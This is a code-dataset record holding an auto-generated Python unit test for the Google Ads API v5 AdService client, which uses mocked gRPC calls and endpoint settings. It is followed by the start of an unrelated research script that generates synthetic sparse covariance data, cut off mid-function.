cb4ed431777e8b10a7599b169d74a3f947751042 | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/ads/googleads/v5/googleads-py/tests/unit/gapic/googleads.v5/services/test_ad_service.py | 8c1b9a30e2d2d599c646bfa72dbe5b188716250f | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,485 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from unittest import mock
import grpc
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.ads.googleads.v5.common.types import ad_asset
from google.ads.googleads.v5.common.types import ad_type_infos
from google.ads.googleads.v5.common.types import custom_parameter
from google.ads.googleads.v5.common.types import final_app_url
from google.ads.googleads.v5.common.types import url_collection
from google.ads.googleads.v5.enums.types import ad_type
from google.ads.googleads.v5.enums.types import app_url_operating_system_type
from google.ads.googleads.v5.enums.types import call_conversion_reporting_state
from google.ads.googleads.v5.enums.types import device
from google.ads.googleads.v5.enums.types import display_ad_format_setting
from google.ads.googleads.v5.enums.types import display_upload_product_type
from google.ads.googleads.v5.enums.types import legacy_app_install_ad_app_store
from google.ads.googleads.v5.enums.types import mime_type
from google.ads.googleads.v5.enums.types import response_content_type
from google.ads.googleads.v5.enums.types import served_asset_field_type
from google.ads.googleads.v5.enums.types import system_managed_entity_source
from google.ads.googleads.v5.resources.types import ad
from google.ads.googleads.v5.services.services.ad_service import AdServiceClient
from google.ads.googleads.v5.services.services.ad_service import transports
from google.ads.googleads.v5.services.types import ad_service
from google.api_core import client_options
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert AdServiceClient._get_default_mtls_endpoint(None) is None
assert AdServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
def test_ad_service_client_from_service_account_info():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = AdServiceClient.from_service_account_info(info)
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_client_from_service_account_file():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = AdServiceClient.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
client = AdServiceClient.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_client_get_transport_class():
transport = AdServiceClient.get_transport_class()
assert transport == transports.AdServiceGrpcTransport
transport = AdServiceClient.get_transport_class("grpc")
assert transport == transports.AdServiceGrpcTransport
@mock.patch.object(AdServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AdServiceClient))
def test_ad_service_client_client_options():
# Check that if channel is provided we won't create a new one.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.AdServiceClient.get_transport_class') as gtc:
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials()
)
client = AdServiceClient(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.AdServiceClient.get_transport_class') as gtc:
client = AdServiceClient(transport="grpc")
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient(client_options=options)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT
# is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = AdServiceClient()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = AdServiceClient()
@mock.patch.object(AdServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AdServiceClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
@pytest.mark.parametrize("use_client_cert_env", ["true", "false"])
def test_ad_service_client_mtls_env_auto(use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
ssl_channel_creds = mock.Mock()
with mock.patch('grpc.ssl_channel_credentials', return_value=ssl_channel_creds):
grpc_transport.return_value = None
client = AdServiceClient(client_options=options)
if use_client_cert_env == "false":
expected_ssl_channel_creds = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_ssl_channel_creds = ssl_channel_creds
expected_host = client.DEFAULT_MTLS_ENDPOINT
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
with mock.patch('google.auth.transport.grpc.SslCredentials.ssl_credentials', new_callable=mock.PropertyMock) as ssl_credentials_mock:
if use_client_cert_env == "false":
is_mtls_mock.return_value = False
ssl_credentials_mock.return_value = None
expected_host = client.DEFAULT_ENDPOINT
expected_ssl_channel_creds = None
else:
is_mtls_mock.return_value = True
ssl_credentials_mock.return_value = mock.Mock()
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_ssl_channel_creds = ssl_credentials_mock.return_value
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
is_mtls_mock.return_value = False
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_ad_service_client_client_options_from_dict():
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_get_ad(transport: str = 'grpc', request_type=ad_service.GetAdRequest):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad.Ad(
resource_name='resource_name_value',
id=205,
final_urls=['final_urls_value'],
final_mobile_urls=['final_mobile_urls_value'],
tracking_url_template='tracking_url_template_value',
final_url_suffix='final_url_suffix_value',
display_url='display_url_value',
type_=ad_type.AdTypeEnum.AdType.UNKNOWN,
added_by_google_ads=True,
device_preference=device.DeviceEnum.Device.UNKNOWN,
name='name_value',
system_managed_resource_source=system_managed_entity_source.SystemManagedResourceSourceEnum.SystemManagedResourceSource.UNKNOWN,
text_ad=ad_type_infos.TextAdInfo(headline='headline_value'),
)
response = client.get_ad(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == ad_service.GetAdRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, ad.Ad)
assert response.resource_name == 'resource_name_value'
assert response.id == 205
assert response.final_urls == ['final_urls_value']
assert response.final_mobile_urls == ['final_mobile_urls_value']
assert response.tracking_url_template == 'tracking_url_template_value'
assert response.final_url_suffix == 'final_url_suffix_value'
assert response.display_url == 'display_url_value'
assert response.type_ == ad_type.AdTypeEnum.AdType.UNKNOWN
assert response.added_by_google_ads is True
assert response.device_preference == device.DeviceEnum.Device.UNKNOWN
assert response.name == 'name_value'
assert response.system_managed_resource_source == system_managed_entity_source.SystemManagedResourceSourceEnum.SystemManagedResourceSource.UNKNOWN
def test_get_ad_from_dict():
test_get_ad(request_type=dict)
def test_get_ad_field_headers():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = ad_service.GetAdRequest()
request.resource_name = 'resource_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
call.return_value = ad.Ad()
client.get_ad(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'resource_name=resource_name/value',
) in kw['metadata']
def test_get_ad_flattened():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad.Ad()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_ad(
resource_name='resource_name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource_name == 'resource_name_value'
def test_get_ad_flattened_error():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_ad(
ad_service.GetAdRequest(),
resource_name='resource_name_value',
)
def test_mutate_ads(transport: str = 'grpc', request_type=ad_service.MutateAdsRequest):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad_service.MutateAdsResponse(
)
response = client.mutate_ads(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == ad_service.MutateAdsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, ad_service.MutateAdsResponse)
def test_mutate_ads_from_dict():
test_mutate_ads(request_type=dict)
def test_mutate_ads_field_headers():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = ad_service.MutateAdsRequest()
request.customer_id = 'customer_id/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
call.return_value = ad_service.MutateAdsResponse()
client.mutate_ads(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'customer_id=customer_id/value',
) in kw['metadata']
def test_mutate_ads_flattened():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad_service.MutateAdsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.mutate_ads(
customer_id='customer_id_value',
operations=[ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].customer_id == 'customer_id_value'
assert args[0].operations == [ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))]
def test_mutate_ads_flattened_error():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.mutate_ads(
ad_service.MutateAdsRequest(),
customer_id='customer_id_value',
operations=[ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = AdServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.AdServiceGrpcTransport,
)
@pytest.mark.parametrize("transport_class", [
transports.AdServiceGrpcTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_ad_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.AdServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'get_ad',
'mutate_ads',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_ad_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default') as adc, mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AdServiceTransport()
adc.assert_called_once()
def test_ad_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AdServiceClient()
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_ad_service_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transports.AdServiceGrpcTransport(host="squid.clam.whelk")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_ad_service_host_no_port():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com'),
)
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_host_with_port():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com:8000'),
)
assert client.transport._host == 'googleads.googleapis.com:8000'
def test_ad_service_grpc_transport_channel():
channel = grpc.insecure_channel('http://localhost/')
# Check that channel is used if provided.
transport = transports.AdServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
@pytest.mark.parametrize("transport_class", [transports.AdServiceGrpcTransport])
def test_ad_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
@pytest.mark.parametrize("transport_class", [transports.AdServiceGrpcTransport,])
def test_ad_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_ad_path():
customer = "squid"
ad = "clam"
expected = "customers/{customer}/ads/{ad}".format(customer=customer, ad=ad, )
actual = AdServiceClient.ad_path(customer, ad)
assert expected == actual
def test_parse_ad_path():
expected = {
"customer": "whelk",
"ad": "octopus",
}
path = AdServiceClient.ad_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_ad_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = AdServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = AdServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = AdServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = AdServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = AdServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = AdServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = AdServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = AdServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = AdServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = AdServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.AdServiceTransport, '_prep_wrapped_messages') as prep:
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.AdServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = AdServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
cb9b3aee824c57b21f29ee6facc88b380fc9eb68 | a0265b6b2350586a3c4e5b52c593129d291bb9ca | /synthetic/synthetic_cov.py | ee8285482027937aef0f48639349edfc68f94749 | [] | no_license | yowald/elliptical-losses | ed3ae0f58a49abecfa7dc76516e6e4ac969dee05 | 0497e4b6863f300e5d05f46d0704c786a59fa986 | refs/heads/master | 2020-08-28T17:57:06.604507 | 2020-01-04T16:22:53 | 2020-01-04T16:22:53 | 217,775,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,820 | py | """Functions to generate synthetic data and run experiment.
flags control number of variables, sparsity parameter, seed etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# from absl import app
# from absl import flags
import os
import sys
import numpy as np
import scipy as sp
from scipy.linalg import cho_factor
from scipy.linalg import LinAlgError
from sklearn.datasets import make_sparse_spd_matrix
import tensorflow as tf
from ..PositiveScalarSamplerFactory import PositiveScalarSamplerFactory
from ..structured_optimizers import GMRFOptimizer
from ..structured_optimizers import LossFunctionFactory
from ..structured_optimizers import structured_elliptical_maximum_likelihood
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('num_features', 10, '')
tf.app.flags.DEFINE_integer('seed', 1, '')
tf.app.flags.DEFINE_integer('num_steps_newton', 75000,
"""Number of steps for newton optimizer.""")
tf.app.flags.DEFINE_integer('num_steps_mm_newton', 1000,
"""Number of steps or newton in MM algorithm.""")
tf.app.flags.DEFINE_integer('num_steps_mm', 100,
"""Number of steps for MM algorithm.""")
tf.app.flags.DEFINE_boolean('delete_checkpoint', False,
"""Delete existing checkpoint and start fresh.""")
tf.app.flags.DEFINE_boolean('delete_existing', False,
"""Delete existing checkpoint and start fresh.""")
tf.app.flags.DEFINE_float('beta', 0.5,
"""shape for generalized gaussian data creation.""")
tf.app.flags.DEFINE_float('nu', 3.,
'degrees of freedom for multivariate-t'
'data creation.')
tf.app.flags.DEFINE_float('learning_rate', 0.05,
"""Train Validation fraction.""")
tf.app.flags.DEFINE_boolean('standardize_data', True,
"""If True, divides data by standard deviation.""")
tf.app.flags.DEFINE_float('outliers_std', 10., '')
tf.app.flags.DEFINE_float('outliers_samples_prob', 0.05, '')
tf.app.flags.DEFINE_float('sparsity_alpha', 0.85, '')
tf.app.flags.DEFINE_string('sampler_type', 'mggd',
"""scalar sampler type to use for data generation""")
tf.app.flags.DEFINE_string('save_dir',
'./elliptical-losses/synthetic/results/',
'Directory where to write event logs '
'and checkpoint.')
def is_pos_def(matrix):
return np.all(np.linalg.eigvals(matrix) > 0)
def get_sparse_high_correlations(dim=25, seed=1, rep_num=1000,
sparsity_alpha=0.9):
"""Gets sparse inverse covariance matrix.
The method draw a few matrices and returns te one where the average
correlation between variables is the highest.
Args:
dim: the dimension of the matrix to be returned.
seed: seed for reproducibility.
rep_num: number of matrices to draw and choose from.
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
Returns:
A sparse inverse covariance matrix.
"""
np.random.seed(seed)
max_mean = 0
for _ in range(rep_num):
candidate_matrix = make_sparse_spd_matrix(dim, alpha=sparsity_alpha,
smallest_coef=.4, largest_coef=.7)
candidate_correlations = np.linalg.inv(candidate_matrix)
diag_part = np.sqrt(np.expand_dims(np.diag(candidate_correlations), axis=0))
candidate_correlations /= diag_part
candidate_correlations /= diag_part.transpose()
cur_mean = np.tril(np.abs(candidate_correlations)).mean()
if max_mean < cur_mean:
best_candidate = candidate_matrix
max_mean = cur_mean
return best_candidate
def get_edge_indices_from_matrix(matrix, miss_probability=0.0):
"""Gets a list of indices where the entries in the given matrix are non-zero.
Each index is a list of two integers [i,j] such that matrix[i,j]!=0.
Args:
matrix: the matrix to get the edges of.
miss_probability: float in the range [0., 1.], edges will be omitted from
the least with this probability.
Returns:
A list of indices (or edges so to speak).
"""
[n, _] = matrix.shape
edge_indices_triu = []
edge_indices_tril = []
for i in range(n-1):
for j in range(i+1, n):
if (np.abs(matrix[i, j]) > 0 and np.random.rand() > miss_probability):
edge_indices_triu.append([i, j])
edge_indices_tril.append([j, i])
edge_indices = np.array(edge_indices_triu + edge_indices_tril)
return edge_indices
def check_pd(matrix, lower=True):
"""Checks if matrix is positive definite.
Args:
matrix: input to check positive definiteness of.
lower: If True gets the lower triangular part of the Cholesky decomposition.
Returns:
If matrix is positive definite returns True and its Cholesky decomposition,
otherwise returns False and None.
"""
try:
return True, np.tril(cho_factor(matrix, lower=lower)[0])
except LinAlgError as err:
if 'not positive definite' in str(err):
return False, None
def get_elliptic_data(scalar_sampler, n, m_train, seed=1, sparsity_alpha=0.9):
"""Generates data from an elliptic distribution.
